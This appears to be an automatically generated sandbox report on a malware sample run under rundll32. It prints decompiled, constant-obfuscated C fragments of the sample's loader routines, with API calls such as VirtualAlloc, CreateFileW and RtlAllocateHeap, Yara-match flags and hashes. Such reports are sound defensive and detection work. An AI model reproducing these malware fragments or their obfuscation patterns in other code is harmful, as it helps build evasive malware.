                                                                      • Instruction Fuzzy Hash: 0521F475D0131DEBEB48DFA6C90A4AEBFB5EB10318F108198D425B62A0D3B94B18DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E02001DFE(void* __edx) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      
                                                                      				_v32 = _v32 & 0x00000000;
                                                                      				_v12 = 0xa959;
                                                                      				_v12 = _v12 >> 6;
                                                                      				_v12 = _v12 ^ 0x0d27cc61;
                                                                      				_v12 = _v12 << 0x10;
                                                                      				_v12 = _v12 ^ 0xcec4698e;
                                                                      				_v8 = 0x266;
                                                                      				_v8 = _v8 | 0x1b157375;
                                                                      				_v8 = _v8 >> 9;
                                                                      				_v8 = _v8 | 0x60c31c80;
                                                                      				_v8 = _v8 ^ 0x60cfecf0;
                                                                      				_v20 = 0xddd8;
                                                                      				_v20 = _v20 | 0xb972bece;
                                                                      				_v20 = _v20 << 2;
                                                                      				_v20 = _v20 ^ 0x20fc7b64;
                                                                      				_v20 = _v20 ^ 0xc537d2af;
                                                                      				_v28 = 0x5083;
                                                                      				_v28 = _v28 << 0xc;
                                                                      				_v28 = _v28 ^ 0x05080fa9;
                                                                      				_v24 = 0xe86a;
                                                                      				_v24 = _v24 >> 5;
                                                                      				_v24 = _v24 + 0xc90c;
                                                                      				_v24 = _v24 ^ 0x00009a6e;
                                                                      				_v16 = 0x5939;
                                                                      				_v16 = _v16 << 1;
                                                                      				_v16 = _v16 + 0xfb70;
                                                                      				_v16 = _v16 + 0xffff7911;
                                                                      				_v16 = _v16 ^ 0x000120b2;
                                                                      				E02006A9A(_v20, _v28, _v24, _v16, E02001999(),  &_v32);
                                                                      				return _v32;
                                                                      			}











                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
                                                                      • Instruction ID: b073413da367bf2f565b142e64436ef33f591f5211819603bd9388f9ef9d3ad5
                                                                      • Opcode Fuzzy Hash: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
                                                                      • Instruction Fuzzy Hash: A221BF75D0020EEFDB59EFE5C58A5AEFBB0BB10708F208588D42172250D3B90B59DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
                                                                      • Instruction ID: 8d41692e737415f54955d6e6d4b71f8d37923ef56a5ac4c98ebb9ddfd342a745
                                                                      • Opcode Fuzzy Hash: 1bd66c3414af41d30ad53092081a3d7845d29b2687e5c3fdf6ea99daaf4f402b
                                                                      • Instruction Fuzzy Hash: 3121BF75D0020EEFDB59EFE4C54A5AEFBB0BB50708F208588D42172251D3B90B59DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E02004F04(void* __eflags, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v36;
                                                                      				signed int _t53;
                                                                      
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v36 = 0x77d1f3;
                                                                      				_v32 = 0x102c4a;
                                                                      				_v28 = 0x31c61e;
                                                                      				_v12 = 0xccec;
                                                                      				_v12 = _v12 >> 5;
                                                                      				_v12 = _v12 >> 0xb;
                                                                      				_v12 = _v12 | 0xecb7e12e;
                                                                      				_v12 = _v12 ^ 0xecb7f166;
                                                                      				_v8 = 0x1581;
                                                                      				_v8 = _v8 | 0xff7deff7;
                                                                      				_v8 = _v8 ^ 0xd17bf610;
                                                                      				_v8 = _v8 ^ 0x2e060f97;
                                                                      				_v16 = 0x4eb3;
                                                                      				_v16 = _v16 + 0xfffffcad;
                                                                      				_v16 = _v16 ^ 0xeadf5fa4;
                                                                      				_v16 = _v16 ^ 0xeadf108b;
                                                                      				_v20 = 0x2120;
                                                                      				_v20 = _v20 ^ 0xb07dd198;
                                                                      				_t53 = 0x4f;
                                                                      				_v20 = _v20 / _t53;
                                                                      				_v20 = _v20 ^ 0x023bed5f;
                                                                      				return 0 | E0200C631(_v12, _a4,  *((intOrPtr*)( *0x2011090 + 0x1c)), _v8, _v16) != _v20;
                                                                      			}













                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0fb8a8522457bc5384e3136a581cc6e301dbdf506e00733bfdf3af101fa210d
                                                                      • Instruction ID: 690ef169876cc7a228a00f208b1ebc1934f05d310eb5ef2808495b1c1af13f17
                                                                      • Opcode Fuzzy Hash: a0fb8a8522457bc5384e3136a581cc6e301dbdf506e00733bfdf3af101fa210d
                                                                      • Instruction Fuzzy Hash: C311E274D4020DEBDB09CFA5D98A5EEFBB1FF44314F108699D925AA2A0C7B80B55DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7ff94fc5db09bf2cffc6a641dbfc9c41617e5a91856c6a501d2d6f82b6806102
                                                                      • Instruction ID: c44e8b4ca43a07e28761fc30f8451f14f96fc8e88a8b2077feb97cd04a9f49e1
                                                                      • Opcode Fuzzy Hash: 7ff94fc5db09bf2cffc6a641dbfc9c41617e5a91856c6a501d2d6f82b6806102
                                                                      • Instruction Fuzzy Hash: FA111474D0020DEBDB08CFA4C98A5EEBBB1FF44304F108588D525A6260C7B80B55CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E01FF3278() {
                                                                      
                                                                      				return  *[fs:0x30];
                                                                      			}



                                                                      0x01ff327e

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 02018361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0201839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 020183A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: 04ecff48eb234fbf3e31fa29dd6e888e1bdf158b5b699fe09ba5ccffcadb1a70
                                                                      • Instruction ID: 2fb8abeafbd25850d1847d23ab74e2b26dd189ce7a5ab291e14a27953b2249ff
                                                                      • Opcode Fuzzy Hash: 04ecff48eb234fbf3e31fa29dd6e888e1bdf158b5b699fe09ba5ccffcadb1a70
                                                                      • Instruction Fuzzy Hash: 7B110371A413159FE320CF609C847BBB7EDFB05720F448A29ED46D7240D7B1A600DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 020185E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0201860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 02018615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: e916b40d8c21c532d867f37bf6451a2c264770f2f704c1860e8ef2cb609d3ca1
                                                                      • Instruction ID: 05f922c5d4f62aca0f968dade12ba72a9507ded5927094e839d6e41cdf198bef
                                                                      • Opcode Fuzzy Hash: e916b40d8c21c532d867f37bf6451a2c264770f2f704c1860e8ef2cb609d3ca1
                                                                      • Instruction Fuzzy Hash: 4931FEB2E0131AAFEB51DEA4CC84AEF77FCAF55215F008526E915E3200EB75D610DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 02018471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0201847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: 0e6a36dae21ebd5b78141f6f29f64b2e7d677f04e87f62cef80a44966c84fe99
                                                                      • Instruction ID: 24fd07a7333b2c82ede915911725371fce972d7bb34ee27942c3877f1b224a10
                                                                      • Opcode Fuzzy Hash: 0e6a36dae21ebd5b78141f6f29f64b2e7d677f04e87f62cef80a44966c84fe99
                                                                      • Instruction Fuzzy Hash: 50112231A813149FE764CF60DC45BA7B7ECFF05320F408A29ED96CB240DBB5A6409BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 02018545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 02018550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: 90fb42a799789d4e605f19eb3a8c94f5edc55d0a826e5fae146b24aeafd7127f
                                                                      • Instruction ID: f247034f5e4ab2d0d864addda6121c4c8ba2b1696375e6337edc1af0eab8f8ba
                                                                      • Opcode Fuzzy Hash: 90fb42a799789d4e605f19eb3a8c94f5edc55d0a826e5fae146b24aeafd7127f
                                                                      • Instruction Fuzzy Hash: 2B110331A417159FE760CF618C44BA7B7EEFB06320F448A2AED05C7240D7B6A600DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 020182E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 020182F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 6c320bab9f6e81baed2246e1f28b80d5be402eccd029ab11bf750f45d27bfd9f
                                                                      • Instruction ID: 46021d9a412e1b69fcc11bb575feb0f06823cabc93ec4585b1f52fbab1bccd3e
                                                                      • Opcode Fuzzy Hash: 6c320bab9f6e81baed2246e1f28b80d5be402eccd029ab11bf750f45d27bfd9f
                                                                      • Instruction Fuzzy Hash: 0C01D631641318AFEB044F50DC88B9FBB9AFB40764F88C525F9048B201C376AE109BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 020181C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 020181CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: 151f25671ac3f8445047f1c8c0d61fcbbdfb98a544d584c3852e689f90e53a5d
                                                                      • Instruction ID: d573f4eac87fd3fb5cbe5fdf2bcfe0a121122287d1c26aa6b3925ce7953e5bbb
                                                                      • Opcode Fuzzy Hash: 151f25671ac3f8445047f1c8c0d61fcbbdfb98a544d584c3852e689f90e53a5d
                                                                      • Instruction Fuzzy Hash: 63016D32A403259BE7509B94D888B67F7DDE741391F84C666ED04CB602C37ADA50DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 02052B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 02052BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 02052BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 02052BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: b2e866fae9f7591522e190fda75dc508a64ecbafadabbebc3c281e0f772b4a61
                                                                      • Instruction ID: 538b4ad91935a288d588a3d2b5f6bf92c4be5d1c118b051f32b8b668f4ba3d7f
                                                                      • Opcode Fuzzy Hash: b2e866fae9f7591522e190fda75dc508a64ecbafadabbebc3c281e0f772b4a61
                                                                      • Instruction Fuzzy Hash: DD2136746043409FEB40DF68C8C0EAAB7F8AF48310F158195ED48CF2A6D775E840DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 02018110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: db5bed2123515fa725822b2ce38b648c03f33263d43d815afe05241513074211
                                                                      • Instruction ID: 0e46f3b322d392e8872acbd612a963bb40dc656fab4e4a6aff8f4a0cea7db47a
                                                                      • Opcode Fuzzy Hash: db5bed2123515fa725822b2ce38b648c03f33263d43d815afe05241513074211
                                                                      • Instruction Fuzzy Hash: C9F024339403014AF7804A34CDC4737758EB742334F80CF21E6258A6C1C33E8B00E644
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:4.3%
                                                                      Dynamic/Decrypted Code Coverage:4.2%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:262
                                                                      Total number of Limit Nodes:13

                                                                      Graph


                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 437 20004c7-2000565 call 1ff7378 ExitProcess
                                                                      C-Code - Quality: 100%
                                                                      			E020004C7() {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _t48;
                                                                      				signed int _t49;
                                                                      
                                                                      				_v8 = 0xb3b9;
                                                                      				_v8 = _v8 + 0x1dd8;
                                                                      				_v8 = _v8 >> 0xa;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 ^ 0x000002ef;
                                                                      				_v20 = 0x5082;
                                                                      				_t48 = 0xc;
                                                                      				_v20 = _v20 / _t48;
                                                                      				_v20 = _v20 ^ 0x00006c35;
                                                                      				_v12 = 0x710;
                                                                      				_v12 = _v12 >> 3;
                                                                      				_t49 = 0x6d;
                                                                      				_v12 = _v12 / _t49;
                                                                      				_v12 = _v12 ^ 0x0000532a;
                                                                      				_v16 = 0x5a4c;
                                                                      				_v16 = _v16 ^ 0xca4a1f4d;
                                                                      				_v16 = _v16 ^ 0xca4a24cd;
                                                                      				E01FF7378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
                                                                      				ExitProcess(0);
                                                                      			}










                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 02000560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: *S$5l$LZ
                                                                      • API String ID: 621844428-1939029103
                                                                      • Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction ID: e4b262c159388f6696a489feb567fc720f0a78e978fad19ceec5f864b40ac6b0
                                                                      • Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction Fuzzy Hash: 6811F771E0520CEBEB04DFE4D84AA9EBBB1EB50714F10C189E514A7294D7F96B548F41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 440 2053928-20539b4 call 20379dc 445 20539b6 440->445 446 20539bd-20539cf GetEnhMetaFileA 440->446 445->446 448 20539d1 446->448 449 20539d8-20539ec 446->449 448->449 450 2053a0e-2053ac5 VirtualAlloc 449->450 451 20539ee-2053a0c 449->451 459 2053acf-2053ada 450->459 451->450 460 2053b21-2053b33 459->460 461 2053adc-2053b1f 459->461 462 2053b75-2053bac 460->462 463 2053b35-2053b73 460->463 461->459 463->462 463->463
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 020539C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,02056CB4,00001000,00000040), ref: 02053A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091897413.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345
                                                                      • API String ID: 2643768156-4105825235
                                                                      • Opcode ID: 4d3adc2f1cf1f0834a7b93784baba7307adb10a6bef81e2ff702f728e04ea475
                                                                      • Instruction ID: ca6d67a1d76c8353d868f86cc8b08fb5941d57e10ecd5c53ea0ca605c84c39e7
                                                                      • Opcode Fuzzy Hash: 4d3adc2f1cf1f0834a7b93784baba7307adb10a6bef81e2ff702f728e04ea475
                                                                      • Instruction Fuzzy Hash: D9619570E853259FE780DF68E586A273FA9FB04354BC08959E5098B260DF7BA864DF04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 491 1ff9b5e-1ff9c3f call 2002550 call 1ff7378 RtlAllocateHeap
                                                                      C-Code - Quality: 72%
                                                                      			E01FF9B5E(void* __ecx, long __edx, long _a4, void* _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _v32;
                                                                      				intOrPtr _v36;
                                                                      				void* _t52;
                                                                      				void* _t68;
                                                                      				signed int _t70;
                                                                      				signed int _t71;
                                                                      				signed int _t72;
                                                                      				long _t81;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t81 = __edx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				E02002550(_t52);
                                                                      				_v36 = 0x84647;
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				_t70 = 0x14;
                                                                      				asm("stosd");
                                                                      				_v20 = 0xbd42;
                                                                      				_t71 = 0x62;
                                                                      				_v20 = _v20 / _t70;
                                                                      				_v20 = _v20 ^ 0x00000265;
                                                                      				_v16 = 0x7dd6;
                                                                      				_v16 = _v16 / _t71;
                                                                      				_v16 = _v16 ^ 0x742f5ff0;
                                                                      				_v16 = _v16 ^ 0x742f2524;
                                                                      				_v12 = 0x61c8;
                                                                      				_t72 = 0x48;
                                                                      				_v12 = _v12 / _t72;
                                                                      				_v12 = _v12 + 0xffff34fc;
                                                                      				_v12 = _v12 ^ 0xffff6696;
                                                                      				_v8 = 0xb2ad;
                                                                      				_v8 = _v8 * 0x5f;
                                                                      				_v8 = _v8 * 0xd;
                                                                      				_v8 = _v8 | 0x4443bccc;
                                                                      				_v8 = _v8 ^ 0x475ff878;
                                                                      				E01FF7378(_t72, 0xa835739b, _t72, 0x90f109b3, 0x146);
                                                                      				_t68 = RtlAllocateHeap(_a8, _a4, _t81); // executed
                                                                      				return _t68;
                                                                      			}
















                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(742F2524,FFFF6696,?,?,?,?,?,?,?,?,?,00000000), ref: 01FF9C38
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: $%/t
                                                                      • API String ID: 1279760036-1978068534
                                                                      • Opcode ID: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction ID: f52a3304ddcb00eb23d28622f3d97456427306db8a4b89acdf360cecde9d3a22
                                                                      • Opcode Fuzzy Hash: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction Fuzzy Hash: CD214671D00209BFEB18CFA9C9469DEBFB5FB44310F108199E814AA2A0D7B99B109B51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 496 200c0c8-200c191 call 2002550 call 1ff7378 CreateFileW
                                                                      C-Code - Quality: 53%
                                                                      			E0200C0C8(long __ecx, long __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, intOrPtr _a24, long _a32, intOrPtr _a36) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				unsigned int _v20;
                                                                      				void* _t40;
                                                                      				void* _t48;
                                                                      				long _t52;
                                                                      				long _t53;
                                                                      
                                                                      				_t52 = __edx;
                                                                      				_push(0);
                                                                      				_push(_a36);
                                                                      				_t53 = __ecx;
                                                                      				_push(_a32);
                                                                      				_push(0);
                                                                      				_push(_a24);
                                                                      				_push(_a20);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t40);
                                                                      				_v20 = 0xb477;
                                                                      				_v20 = _v20 >> 0x10;
                                                                      				_v20 = _v20 ^ 0x000000e5;
                                                                      				_v16 = 0xb312;
                                                                      				_v16 = _v16 + 0x2a6f;
                                                                      				_v16 = _v16 ^ 0x0000d90b;
                                                                      				_v12 = 0x5a0b;
                                                                      				_v12 = _v12 + 0x400b;
                                                                      				_v12 = _v12 << 0xc;
                                                                      				_v12 = _v12 ^ 0x09a119a3;
                                                                      				_v8 = 0x3388;
                                                                      				_v8 = _v8 + 0x85f8;
                                                                      				_v8 = _v8 * 0x5a;
                                                                      				_v8 = _v8 ^ 0x00415e39;
                                                                      				E01FF7378(__ecx, 0x81a8678d, __ecx, 0x90f109b3, 0x2bf);
                                                                      				_t48 = CreateFileW(_a8, _t52, _t53, 0, _a32, _a20, 0); // executed
                                                                      				return _t48;
                                                                      			}












                                                                      APIs
                                                                      • CreateFileW.KERNEL32(0000D90B,?,D583BA2A,00000000,?,0ACC4A3C,00000000), ref: 0200C189
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2091845776.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000008.00000002.2091882059.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000008.00000002.2091891119.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: 9^A
                                                                      • API String ID: 823142352-4044883665
                                                                      • Opcode ID: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction ID: 3634cf961e5269d84bb9ce76844c508a8a838f4f80d4d86795d2dcdcde9cd559
